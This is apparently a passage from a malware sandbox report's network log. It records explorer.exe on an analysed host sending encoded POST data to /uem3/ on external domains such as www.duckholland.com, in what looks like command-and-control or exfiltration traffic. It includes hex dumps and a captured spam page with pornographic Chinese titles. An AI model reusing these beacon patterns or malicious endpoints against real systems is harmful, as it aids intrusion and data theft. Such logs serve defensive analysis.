61 6e 50 7a 73 30 64 76 59 4a 46 2d 65 70 33 39 42 4c 36 6e 28 59 67 4c 44 4a 38 45 58 53 4b 4c 4d 6a 59 6b 51 7a 68 30 31 63 28 70 56 51 53 42 7e 4a 61 67 6a 58 4e 43 4c 5f 51 4a 49 61 49 75 70 6a 43 46 76 2d 49 38 32 5a 71 33 71 42 51 68 54 76 7e 71 48 72 61 6c 72 30 41 79 58 4e 44 55 74 45 70 42 41 59 73 52 6a 42 41 34 28 31 6d 2d 61 71 64 4f 4f 38 43 55 4a 39 76 56 34 4a 61 44 77 30 37 6c 74 70 31 75 62 58 77 34 67 66 54 69 33 58 4e 62 75 76 45 62 59 32 68 69 64 5a 42 4d 51 65 62 31 33 77 69 71 59 58 6e 69 7a 69 68 70 76 66 69 2d 6b 53 64 62 50 6e 51 78 58 5a 61 38 54 37 56 70 67 45 76 76 59 63 68 4a 71 78 71 44 57 68 4d 6a 71 69 43 72 4d 4b 67 55 36 35 57 5a 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BpE=3vCjpB0GhVTy8SBHS3VMjfMUm1UGAxF2KfrDQ_dQIjbMZQCoJb9I2Xy_eHwpaicJziH-ClycLF2aBOho4EJyWDd9gZrApS7TW7i40OjhzT0-Ne4JQ3yM66QppX(DUYpOIVGCmxivR3niuolx9dTAOkkyqBG84pEeVMgPZhMedvuSBR22BMa0p_jqerfyv_kpRsjzavKjbufilsCMmg1XwmbKG6CnvFBycpaln7MP~HL73lNUF_mzwikLtchW~VuQwB~X(rjF5lJlnnzWbOdQ94n-0idhvjkX9zh0(DwvvQ1SAr9-fgzSE4w216yqPSnhVYIzdOz1ZiC9djWDNis3GT8Bk4UX(BPLTx6ceki_jVjHaKv5HfuCfIWqPmr2cs2ciIoBqda99fmDwj13yqmntFtmEpnwlJHkY4Uukuj9sEPoPHb1JECT3_8JTrbMtFNrjqK0Z8jQYEgReSYnhf3kbLxDBOsX01qaanPzs0dvYJF-ep39BL6n(YgLDJ8EXSKLMjYkQzh01c(pVQSB~JagjXNCL_QJIaIupjCFv-I82Zq3qBQhTv~qHralr0AyXNDUtEpBAYsRjBA4(1m-aqdOO8CUJ9vV4JaDw07ltp1ubXw4gfTi3XNbuvEbY2hidZBMQeb13wiqYXnizihpvfi-kSdbPnQxXZa8T7VpgEvvYchJqxqDWhMjqiCrMKgU65WZUw).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49920	154.94.246.226	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:31.168019056 CEST	12223	OUT	POST /uem3/ HTTP/1.1 Host: www.duckholland.com Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.duckholland.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.duckholland.com/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 33 76 43 6a 70 42 35 46 28 32 57 6d 77 69 4e 6b 55 46 6c 51 74 4f 38 53 6a 45 45 4a 50 55 4d 6f 4e 74 66 58 4e 72 5a 74 5a 52 62 57 64 6b 6a 34 43 36 31 41 32 56 71 43 58 52 59 74 64 43 67 4b 7a 69 66 55 43 6d 65 63 49 47 33 42 41 6f 39 47 34 6d 68 78 51 6a 64 4e 6a 5a 71 51 7e 6a 32 7a 57 37 57 67 30 4f 72 78 7a 6e 30 2d 4e 38 77 4a 53 30 4b 54 30 36 51 6a 31 48 76 50 4c 49 73 6b 49 56 75 4b 6d 7a 32 76 51 48 37 69 74 49 31 77 73 4f 4c 44 44 55 6b 39 36 52 47 6c 7a 4a 4a 6e 56 4d 6c 67 5a 6b 73 65 64 61 32 53 43 68 57 32 41 5f 79 72 39 5f 6a 6a 50 37 66 37 72 5f 67 43 52 73 7e 79 61 75 50 65 63 66 72 69 33 4d 43 4a 78 44 55 69 68 46 7a 6e 4b 5a 66 50 76 46 38 75 66 34 48 77 6e 35 59 4b 75 6b 69 54 34 68 31 75 46 36 28 6d 6a 53 6b 48 6d 38 68 33 7e 56 75 4a 77 42 7e 70 28 72 54 46 35 69 74 6c 39 48 66 57 61 65 64 54 7a 49 6e 5f 34 43 63 6a 34 54 70 30 39 7a 35 6f 28 42 67 76 75 6c 56 53 42 34 31 2d 59 46 66 52 49 34 77 34 7a 36 7a 33 43 79 6e 2d 56 59 4a 65 64 50 7a 6c 5a 52 32 39 63 32 36 44 4d 41 30 33 45 44 38 42 68 34 55 47 31 68 44 62 54 78 6a 58 65 67 6e 4b 69 6b 6e 48 62 59 6e 35 48 2d 75 43 59 34 57 71 48 47 72 33 4c 63 32 57 69 49 59 4a 71 64 37 67 39 4f 71 44 78 48 78 33 7a 49 4f 6e 73 31 74 69 4b 4a 6e 71 79 38 65 43 59 37 6f 6d 6b 72 62 74 73 31 4c 6f 4e 6c 44 31 49 78 75 51 7a 50 38 4e 42 62 62 71 77 31 42 51 6a 75 6d 65 5a 2d 32 4c 59 33 77 52 65 47 4d 6e 78 71 44 6e 66 37 77 49 41 4f 73 54 7e 56 75 31 61 6e 47 6f 73 78 39 76 59 4b 68 2d 66 5a 48 39 45 4d 57 6f 79 6f 67 4d 63 35 38 75 58 53 4f 38 4d 6a 45 6b 51 33 70 6b 31 4d 76 70 56 78 43 42 39 37 43 68 33 33 4e 41 4b 5f 51 5a 65 61 49 62 70 6a 44 57 76 5f 42 37 32 72 53 33 74 54 59 68 54 4c 4b 71 44 72 61 6b 34 45 41 32 54 4e 50 76 74 41 4a 76 41 61 6f 52 6b 79 30 34 28 58 75 2d 66 4b 64 4a 42 73 43 56 42 64 76 65 72 5a 57 33 77 30 6a 48 74 6f 56 59 61 68 49 34 67 64 72 69 7a 43 68 63 75 66 45 61 4e 47 68 39 64 5a 41 39 51 65 62 58 33 77 32 36 59 58 66 69 78 53 68 70 6e 39 4b 5f 67 43 64 65 49 6e 51 46 4d 4a 61 72 54 37 55 61 67 45 6e 56 5a 71 67 72 6e 43 7a 66 57 6e 63 76 68 41 44 4d 4d 59 6f 47 36 35 62 42 4a 50 7e 76 63 53 74 6c 6b 37 67 41 4c 61 61 31 39 49 76 6e 37 48 6d 77 6a 6e 54 79 35 31 41 68 76 63 50 64 31 51 53 34 37 6c 65 45 73 5a 32 49 42 6a 73 32 59 51 69 6c 56 49 34 61 33 78 64 51 55 75 63 61 65 69 6d 74 35 47 31 79 52 58 69 45 58 4d 65 6b 28 2d 70 36 36 41 4e 72 7a 71 70 4a 78 74 36 46 79 59 39 33 70 43 44 4e 76 6a 76 5a 47 37 37 52 4c 76 54 6a 62 59 69 46 45 4c 71 7a 42 6a 6c 33 50 48 53 5a 6b 59 58 70 61 38 50 48 70 5f 4d 66 33 42 4d 53 32 6a 44 38 45 51 65 32 41 6c 36 49 62 53 7e 54 71 73 30 6e 73 76 78 45 51 75 52 54 59 30 66 45 51 53 75 5f 6a 36 79 4d 64 6d 4f 30 4e 51 4b 51 49 48 31 4b 68 4f 5a 30 7e 73 37 6d 61 35 37 53 77 63 5a 4c 51 7a 6c 39 6e 74 68 44 62 4a 38 65 75 7a 6f 6a 74 73 4e 67 66 41 6e 65 46 39 51 6d 44 57 58 4d 4a 6c 6d 56 57 4a 77 6e 77 44 49 70 4b 4c 32 31 34 54 65 74 28 75 51 6e 70 31 32 41 63 4d 30 55 69 65 78 47 36 35 43 67 61 31 4c 71 58 44 69 50 62 31 65 61 66 5a 4b 51 49 6d 51 67 54 73 59 78 4f 42 48 77 4d 5f 61 63 36 58 6d 4a 6d 67 53 39 74 6f 43 57 77 70 74 35 57 43 77 4b 32 39 76 61 7e 4f 42 4f 65 77 76 52 69 4e 4d 53 33 51 66 59 79 38 65 45 76 72 44 61 77 6c 62 4c 6a 43 32 70 4b 70 52 5a 42 6a 67 72 31 65 6b 49 34 41 4f 30 50 35 6b 4c 51 6f 50 6d 63 58 47 52 69 49 63 70 38 4b 56 2d 42 46 79 6d 28 74 58 67 58 31 6e 51 43 52 62 36 64 55 53 51 5a 30 45 65 7a 59 62 41 61 54 44 54 4d 63 71 77 56 6a 69 4d 67 55 49 76 57 66 51 71 36 4f 41 7a 42 5f 5a 75 59 65 35 43 76 4a 73 70 65 77 66 44 67 73 6a 77 36 6b 39 54 6b 33 47 45 48 63 4a 5f 4b 64 4f 59 47 4b 6d 79 52 76 71 76 57 48 6e 51 32 47 70 72 34 42 68 46 70 7a 6e 72 61 67 58 75 54 39 5a 50 6f 62 6c 58 6d 67 65 58 79 64 30 2d 4a 52 42 47 33 4c 48 37 73 30 7a 73 47 68 59 54 4e 50 30 57 28 44 77 36 32 64 31 7a 4d 48 67 70 38 42 28 63 50 62 44 6d 57 77 4a 71 67 6e 73 68 49 70 48 4e 54 34 35 4a 66 32 6e 49 31 72 37 47 70 75 39 55 68 76 33 78 75 4f 55 4c 61 4e 6d 6a 64 59 70 50 5a 39 68 6a 41 70 6c 5a 52 47 75 54 34 38 43 4a 48 7a 43 6e 44 33 50 Data Ascii: BpE=3vCjpB5F(2WmwiNkUFlQtO8SjEEJPUMoNtfXNrZtZRbWdkj4C61A2VqCXRYtdCgKzifUCmecIG3BAo9G4mhxQjdNjZqQ~j2zW7Wg0Orxzn0-N8wJS0KT06Qj1HvPLIskIVuKmz2vQH7itI1wsOLDDUk96RGlzJJnVMlgZkseda2SChW2A_yr9_jjP7f7r_gCRs~yauPecfri3MCJxDUihFznKZfPvF8uf4Hwn5YKukiT4h1uF6(mjSkHm8h3~VuJwB~p(rTF5itl9HfWaedTzIn_4Ccj4Tp09z5o(BgvulVSB41-YFfRI4w4z6z3Cyn-VYJedPzlZR29c26DMA03ED8Bh4UG1hDbTxjXegnKiknHbYn5H-uCY4WqHGr3Lc2WiIYJqd7g9OqDxHx3zIOns1tiKJnqy8eCY7omkrbts1LoNlD1IxuQzP8NBbbqw1BQjumeZ-2LY3wReGMnxqDnf7wIAOsT~Vu1anGosx9vYKh-fZH9EMWoyogMc58uXSO8MjEkQ3pk1MvpVxCB97Ch33NAK_QZeaIbpjDWv_B72rS3tTYhTLKqDrak4EA2TNPvtAJvAaoRky04(Xu-fKdJBsCVBdverZW3w0jHtoVYahI4gdrizChcufEaNGh9dZA9QebX3w26YXfixShpn9K_gCdeInQFMJarT7UagEnVZqgrnCzfWncvhADMMYoG65bBJP~vcStlk7gALaa19Ivn7HmwjnTy51AhvcPd1QS47leEsZ2IBjs2YQilVI4a3xdQUucaeimt5G1yRXiEXMek(-p66ANrzqpJxt6FyY93pCDNvjvZG77RLvTjbYiFELqzBjl3PHSZkYXpa8PHp_Mf3BMS2jD8EQe2Al6IbS~Tqs0nsvxEQuRTY0fEQSu_j6yMdmO0NQKQIH1KhOZ0~s7ma57SwcZLQzl9nthDbJ8euzojtsNgfAneF9QmDWXMJlmVWJwnwDIpKL214Tet(uQnp12AcM0UiexG65Cga1LqXDiPb1eafZKQImQgTsYxOBHwM_ac6XmJmgS9toCWwpt5WCwK29va~OBOewvRiNMS3QfYy8eEvrDawlbLjC2pKpRZBjgr1ekI4AO0P5kLQoPmcXGRiIcp8KV-BFym(tXgX1nQCRb6dUSQZ0EezYbAaTDTMcqwVjiMgUIvWfQq6OAzB_ZuYe5CvJspewfDgsjw6k9Tk3GEHcJ_KdOYGKmyRvqvWHnQ2Gpr4BhFpznragXuT9ZPoblXmgeXyd0-JRBG3LH7s0zsGhYTNP0W(Dw62d1zMHgp8B(cPbDmWwJqgnshIpHNT45Jf2nI1r7Gpu9Uhv3xuOULaNmjdYpPZ9hjAplZRGuT48CJHzCnD3P8X3SaE_aCHUSsra1nHfvMj13UN7dlXZyhXoAJvYXSXmuf9xCEPRDAaRrELsbMO3HwCb0s6pjrdihavFyGPAuZKucxlf88xaQJuEejhfRx~ARBxZ4GWSYsfP0UQnDa0s7YPgt3aCV-cQINB7M38E65S9Hysm3r~fEhMJcmV2AzgHB2F765ORVOBc~z29xyOgpXx3gqGk7MZYWcS4zU7AmfMzuUZqIOySrdcG5KS8Ryygc1RHZPpx5ROxkDw67-dKowr2KAzo6rTgLM4m0ZxykWZdkTWlvyh1INm3y6w_hmo6dsnhRbx9hRyDFjQqWA6QTXFLjEzPv9NWDlAvVocFBsapRPosivbgYrYRK29BL8MLrhnEXNlbEufYIR68mjwnupMnpl286Z1Lsb~BZ5w9ycWnoT1b2AD2W2qW4JtKcAEBmwcBoVP8jpGaoLf-vFcUrJhgS6DarrRW75JlmqLqLslz~LK_AOjwyAZOL6cwRVo1xuyG2jfWssvQfaBPdqFQtVrPJhhSifOLv3GKldTIsdxnBoS3E4RRVr7qK6Vwe3IdcHH0Z4w3y_Ez2ZhuCyOtsSY5QRuyC8rpi_VAEZ88WV8UXhSWOu39qQ9Vc5afxHhmgMPC(yHK2OLAKe5hj79qbY4bNs8XEt7BYNEqBWavnNACnIKynsSVQ4yS3U8etESOT6eqTM78HBmf47GfrIM8TPNy1shKC_wnTt(778cMAnTq~hS4dtNiYUrXymULlOz9o5L7vXq_(BiftOce3P2Jo0(qg8LO957g68WgG7WLTPA_5MhMzyWBCBCfNoJKVCAnS4Uae4U5ZL3YSje9nclAeryvE4HOf9S4ueBZLMhE5ptgvv4CEBECxCDicAx2HhSiIS2J8bhdKaAK(YSi0ZsWsx2FJZSWDgCrGqMFaKt9(1X34lUMfEhksYHCjv0uZS5tefb1ayOhMptrKO4bKCjcNblnuelSbA1eqfZ4aH0E0rpXw2GRy_8OvRgSEf2GUM9cHq2H18sC2cSv~HDWrEzSOaPSXr3zAa6JfnkTnF(T3bUoWaszG39DtAjsG6xspRkxVmt01jjZkuN7cnsi~Cl3QI8oj5W8SH7-3skN~L5II6AMnirlvBu9bQtwt1CxZBTOcm456G6s(e9MSCXF6pFMlPMTI6aUzjqWrKIfA-lDX8wP16abKS(hf5RIOBYrpcrp4MVBDeYwctim(sC6dy6bOlZDYOK74xVIt8a0njLBE8Xei_BrFs5EBK48or2idVaWNnxwAl013A9A63zOfo6Jt0D1ac3KxWjksDiy5s5bF-kxBsCTnwAsTrbVExeKpIKSYiSVH5YoJbKKS4vZTOwsHib812pbO5vzkfztFMqx1lN9cPWdiB~F92XxXh0etv0khUoKfeOVOYwcYE(69QLfrJ3lPFFvJjgxLSeAc3imgXqpKAarrNlm(E9OhtzMyHOGI2dehT51L9G0QUXQ5o3FQnrrWscKHFNgDO~EaQxr0FoIgSEwcATuKNIm6BgQqj3iLJmLa_NKx4HnT0p1gXUDMQf8SW0cDp5rUO(COyrsAklg5Naciz~MnPsgKEvMt-3Mkux8gEOGKP~by2TNygTLl193XaTJxM6GmTIYU1y9E7R2lj~XtSbCm9629dlbis73KaCbeBfC2no-YD1vACQHFv4vFJwg7VmUEPBByl~pxGri0ka6a2l6McoxOMY9yA5HGKNBYybc1yJ35SV-fNG30Ilv7-rgrFXX(FEBVqq2TWKB3NyXKj2jbMmHOZZwmR7OTsZ_iGDOxXbKEfzgk8NQFOdzz17r5ZQlXkbC1ycGQaCnDKJq4ikTGS~VjEH2zMn9YcWuU1oueLwsaRKKv4ZIJ-WErtr0(ocAM-eyDMSTTnj-(gHRKNQoj0BTgV6-eBCb12b659KBlDoiKRmiuBun0USwToZE2ILxtWH50brtnJKDqlLduF(Xo5KBW80wIwSstd0w166RyAs4PaBAohKDGLhRLYaP28xxiMfjT_WEi30FEhuxZTNX3ckyx7V7kN8HI9qp5SD2c0KHqUHoxkyotgX27B35lOn-vmL0hGk_2jA_kZBXa_1jTDPcf7(wDWwobOE8vYSBTLx3UPUo~nbZenI6idaMvkJIVLjlUYQGZic8xA1wfuwHSzpgZrVXEzEyMZs5qSIOnOUw4cII42exPx2khV5pf2TKM_7o9S1ASov6Ktgrlnj08A8BFw5321EJbK1kXP6Zz-XIXKFby7Fyw7U2hmFFECWGKTFzYOubOPcWSOfrWTy4NAHPdZkm1GyruJrd(wVBoXIeY6Awvlcdpi18SB3SJII0g8h39UtEj8WYNsRY(PCZ07CSvXI3uXjonynewrITlgdbHIi_tTPqOAWUSMybHR9baHOP~vWYKR8usM9PlhcPmmjdzXjnPQ7k9lG3668trtn2zAoHi3OCJs~j3_7gTf9jRDf4pX4KKiRpEmxkFDFLQALzmKD-fj9HriBLP7rQd43CdNYNiryYUbgVQDFAzloLb7Uk42eZST8LnWI4c1~a68os2yYbeMMG6oH8KLnYSUPBHB~5LRwzjT8ctxeok4CECF9_m0bVrZURYKS5Zti7U7eQxRGSS-qcgGHqzCqH5wDQdqe1SwXRKQ3_rzHD(kMy6_vDchsqEkvBIaCfv3L4B-v8HqrAqE86YlLawrorifjWPjsOrgf1pJh5RAEV(QDVSNWVZMChQlpXD6J_hjwP9zSr
Jun 21, 2022 21:09:31.339440107 CEST	12244	OUT	Data Raw: 7a 76 62 33 73 58 52 28 5a 5a 68 6a 72 44 4d 38 76 46 4f 62 78 70 67 77 75 46 63 48 49 7e 47 6a 64 71 7a 70 48 67 78 74 43 56 34 4c 58 78 78 37 59 63 6d 78 39 56 79 33 52 4c 42 6d 4a 39 43 62 6b 57 31 4e 46 50 35 65 66 30 74 38 46 6f 74 70 70 66 Data Ascii: zvb3sXR(ZZhjrDM8vFObxpgwuFcHI~GjdqzpHgxtCV4LXxx7Ycmx9Vy3RLBmJ9CbkW1NFP5ef0t8Fotppf-7HbsC6D8d64fAQ(fRNpJALuP~sxgm1lKVVxOao4gmTvBRnkyuIu2Bt(Y40d73t6aTGq5WtnLQ7ME2Gstd9(yoEfeO32iQ1hjSe3OPf9SBnD0TFcguhNbwLhlpNBo(GmsU_n5j5Wr01whRWoaErts35CeA1STrLsn
Jun 21, 2022 21:09:31.510905027 CEST	12252	OUT	Data Raw: 6a 54 33 65 2d 6a 67 46 5a 6e 54 4c 39 68 4a 36 76 53 69 52 65 35 73 55 4a 55 4e 61 51 47 65 37 56 4a 46 6b 6a 49 57 4d 74 78 75 73 37 52 59 69 33 51 53 62 32 46 7a 62 72 38 6b 53 5a 62 68 32 59 39 51 58 64 33 33 4e 79 63 2d 6a 33 4b 6a 52 67 34 Data Ascii: jT3e-jgFZnTL9hJ6vSiRe5sUJUNaQGe7VJFkjIWMtxus7RYi3QSb2Fzbr8kSZbh2Y9QXd33Nyc-j3KjRg499oab4XQs6EPJlieRXwCmkNO3goFy6EyTDeml71mXkDOUU5SW4Sdwl-lxZgTongbwf4~Wbyk0yIjlvvZK7D7EfHcL2G2LqjgXMyibv0MmaDNFouuYPsBukrkyT0JyRhJwqBkjt4yHEimGwhRAvxbgaMp-MgOzo23e

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49922	154.94.246.226	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:31.770924091 CEST	12252	OUT	GET /uem3/?SH=IDKTKDM&BpE=4t2Z3lNwjnLZlDwEEC0m8LkRlQI0Pl9ucZSXJIF5IRDrQEKlG6sw6AjHC30zWhIZsVHq HTTP/1.1 Host: www.duckholland.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 21, 2022 21:09:31.950568914 CEST	12301	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 21 Jun 2022 19:09:33 GMT Content-Type: text/html Content-Length: 1797 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d2 f8 b4 a8 b9 cb c2 cb c6 fb b3 b5 b7 fe ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 2e 2e 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 31 34 34 38 3b 26 23 34 30 36 34 34 3b 26 23 32 31 34 34 38 3b 26 23 32 39 32 34 35 3b 26 23 32 31 34 34 38 3b 26 23 33 33 33 39 34 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 39 34 30 38 3b 26 23 32 39 34 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 32 31 30 38 3b 26 23 32 36 30 38 35 3b 26 23 32 36 30 38 35 3b 26 23 32 32 31 30 38 3b 26 23 36 35 3b 26 23 38 36 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 38 32 3b 26 23 33 32 34 32 33 3b 26 23 33 38 34 38 30 3b 26 23 32 31 30 34 36 3b 26 23 32 39 32 35 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 33 30 30 30 37 3b 26 23 32 31 35 31 36 3b 26 23 32 34 30 34 30 3b 26 23 32 32 38 32 33 3b 26 23 33 31 38 39 35 3b 26 23 32 39 32 34 35 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 38 36 3b 26 23 37 33 3b 26 23 36 38 3b 26 23 36 39 3b 26 23 37 39 3b 26 23 38 33 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2e 2e 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 31 34 34 38 3b 26 23 34 30 36 34 34 3b 26 23 32 31 34 34 38 3b 26 23 32 39 32 34 35 3b 26 23 32 31 34 34 38 3b 26 23 33 33 33 39 34 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 39 34 30 38 3b 26 23 32 39 34 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 32 31 30 38 3b 26 23 32 36 30 38 35 3b 26 23 32 36 30 38 35 3b 26 23 32 32 31 30 38 3b 26 23 36 35 3b 26 23 38 36 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 38 32 3b 26 23 33 32 34 32 33 3b 26 23 33 38 34 38 30 3b 26 23 32 31 30 34 36 3b 26 23 32 39 32 35 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 33 30 30 30 37 3b 26 23 32 31 35 31 36 3b 26 23 32 34 30 34 30 3b 26 23 32 32 38 32 33 3b 26 23 33 31 38 39 35 3b 26 23 32 39 32 34 35 3b 26 23 37 31 3b 26 23 38 36 3b 26 23 38 36 3b 26 23 37 33 3b 26 23 36 38 3b 26 23 36 39 3b 26 23 37 39 3b 26 23 38 33 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2e 2e 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 31 34 34 38 3b 26 23 34 30 36 34 34 3b 26 23 32 31 34 34 38 3b 26 23 32 39 32 34 35 3b 26 23 32 31 34 34 38 3b 26 23 33 33 33 39 34 3b 26 23 33 30 33 34 30 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 39 34 30 38 3b 26 23 32 39 34 30 38 3b 26 23 32 32 31 30 38 3b 26 23 32 32 38 32 35 3b 26 23 32 32 38 32 35 3b 26 23 32 32 31 30 38 3b 26 23 32 36 30 38 35 3b 26 23 32 36 30 38 35 3b 26 23 32 32 31 30 38 3b 26 23 36 35 3b 26 23 38 36 3b 2c 26 23 32 36 30 38 30 3b 26 23 33 30 37 32 31 3b 26 23 38 32 3b 26 23 33 32 34 32 33 3b 26 23 33 38 34 38 30 3b 26 23 32 31 30 34 36 3b 26 23 32 39 32 35 35 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>..免费又黄又爽又色的视频,狠狠噜天天噜日日噜AV,无码R级限制片在线观看,欧美男同巨大粗爽GVVIDEOS</title><meta name="keywords" content="..免费又黄又爽又色的视频,狠狠噜天天噜日日噜AV,无码R级限制片在线观看,欧美男同巨大粗爽GVVIDEOS" /><meta name="description" content="..免费又黄又爽又色的视频,狠狠噜天天噜日日噜AV,无码R级限制片在线&#352
Jun 21, 2022 21:09:31.950623989 CEST	12302	IN	Data Raw: 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 33 30 30 30 37 3b 26 23 32 31 35 31 36 3b 26 23 32 34 30 34 30 3b 26 23 32 32 38 32 33 3b 26 23 33 31 38 39 35 3b 26 23 32 39 32 34 35 3b 26 23 37 31 3b 26 Data Ascii: 66;看,欧美男同巨大粗爽GVVIDEOS,男人J进女人P高清播放,女人ZOZOZ&#

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49861	188.114.96.6	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 21, 2022 21:09:03.644167900 CEST	11003	OUT	POST /uem3/ HTTP/1.1 Host: www.astrofrance.online Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.astrofrance.online User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.astrofrance.online/uem3/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 42 70 45 3d 75 79 4a 4b 44 42 49 72 52 75 4d 77 76 42 31 49 74 54 76 68 50 4c 66 54 65 4a 56 32 45 43 50 44 4b 36 31 79 59 54 77 61 41 41 56 7a 4f 72 53 54 34 4e 62 4a 57 73 64 55 39 6e 30 36 50 74 72 55 55 52 6e 57 44 49 76 31 5a 58 74 4b 37 2d 4f 71 36 32 7e 64 34 4b 48 78 68 68 6e 35 69 67 43 76 55 4e 72 32 43 51 6d 46 31 2d 35 51 35 62 67 32 70 61 64 46 34 4e 31 64 51 36 77 47 56 6f 45 45 71 64 76 62 35 50 56 30 56 4c 61 7a 6b 69 63 64 54 51 4b 54 66 72 61 42 37 36 38 73 42 59 69 6f 4d 33 30 30 49 6d 70 39 44 52 54 68 42 70 70 72 4e 69 35 41 75 33 45 46 75 34 4f 31 39 6c 7a 59 79 75 4e 31 47 6d 59 52 4d 62 58 50 38 48 39 46 4b 7a 31 49 63 78 65 4e 41 4e 50 34 4b 6f 4c 52 62 65 77 43 31 6e 41 6d 4a 64 4b 42 6c 73 30 54 59 46 5a 77 53 6d 39 5f 30 2d 79 77 65 55 35 61 78 72 79 74 6d 6d 6f 68 52 7a 5a 50 6c 44 5a 67 70 47 36 30 70 63 54 79 74 34 67 33 79 57 68 48 6b 74 41 34 4a 48 4f 6b 37 58 46 79 4e 61 72 4e 6b 5f 49 45 65 76 71 74 7a 6a 71 63 64 4c 31 41 6f 47 55 50 49 49 58 5f 4f 59 32 78 58 49 61 63 78 72 35 56 37 73 62 70 43 58 70 49 46 4b 37 53 34 75 28 30 37 73 4f 63 39 63 6a 58 6e 47 28 67 61 6f 30 72 65 61 76 71 4a 66 45 74 4a 53 54 42 43 7a 4a 6a 4e 59 76 48 30 52 68 77 30 30 32 68 35 50 41 77 64 54 74 36 51 79 79 47 36 67 47 7a 6f 63 67 35 79 6e 6f 4c 7a 56 56 75 35 45 72 76 33 5a 52 68 50 73 41 65 4f 68 48 63 47 53 39 45 66 6a 32 72 5a 4c 6d 65 66 55 39 58 49 58 30 45 55 4a 51 76 28 4a 64 67 59 5a 6c 68 74 75 74 4a 65 43 65 69 37 51 62 63 49 76 61 62 79 64 6b 5a 46 47 74 35 71 59 4c 74 7a 6d 51 4d 35 65 73 45 38 6a 53 41 44 64 47 32 49 79 64 44 36 31 4e 71 6e 74 35 6c 59 47 7a 7a 39 69 7a 72 43 4f 4c 49 79 6f 50 42 68 49 48 55 4d 6d 7a 56 70 6d 4f 63 43 75 71 39 35 4e 78 72 46 49 73 6d 4c 56 70 35 72 39 6d 47 42 4c 4e 68 6c 6f 72 30 76 5a 45 45 28 46 33 6d 79 37 6f 32 57 38 63 6e 61 4c 4f 32 7e 5f 39 54 76 52 30 6b 4b 41 77 5f 44 63 6d 4e 67 47 6b 46 68 42 6a 47 6c 79 41 64 74 54 41 79 4b 6c 41 6c 56 63 58 2d 32 4a 30 37 51 73 79 48 6d 76 79 30 73 48 56 51 71 2d 6b 5a 4d 62 39 70 52 5a 33 32 41 53 33 37 34 42 42 49 77 46 49 59 56 6f 53 5f 46 6d 55 64 6f 6a 64 4c 76 6c 32 6c 51 58 54 71 70 78 50 78 72 63 4b 62 58 59 5a 79 56 46 47 36 53 46 67 57 75 4a 66 35 56 54 77 50 6f 45 78 2d 43 43 5a 45 6d 74 45 73 61 45 77 57 41 54 36 78 6d 38 38 6b 31 4a 54 52 31 39 5a 36 42 71 33 4f 6f 4d 38 61 45 35 5a 35 28 45 7e 47 47 53 33 58 71 6c 33 6d 52 63 5a 53 32 6f 28 5f 37 45 39 4d 34 4b 77 47 52 47 57 41 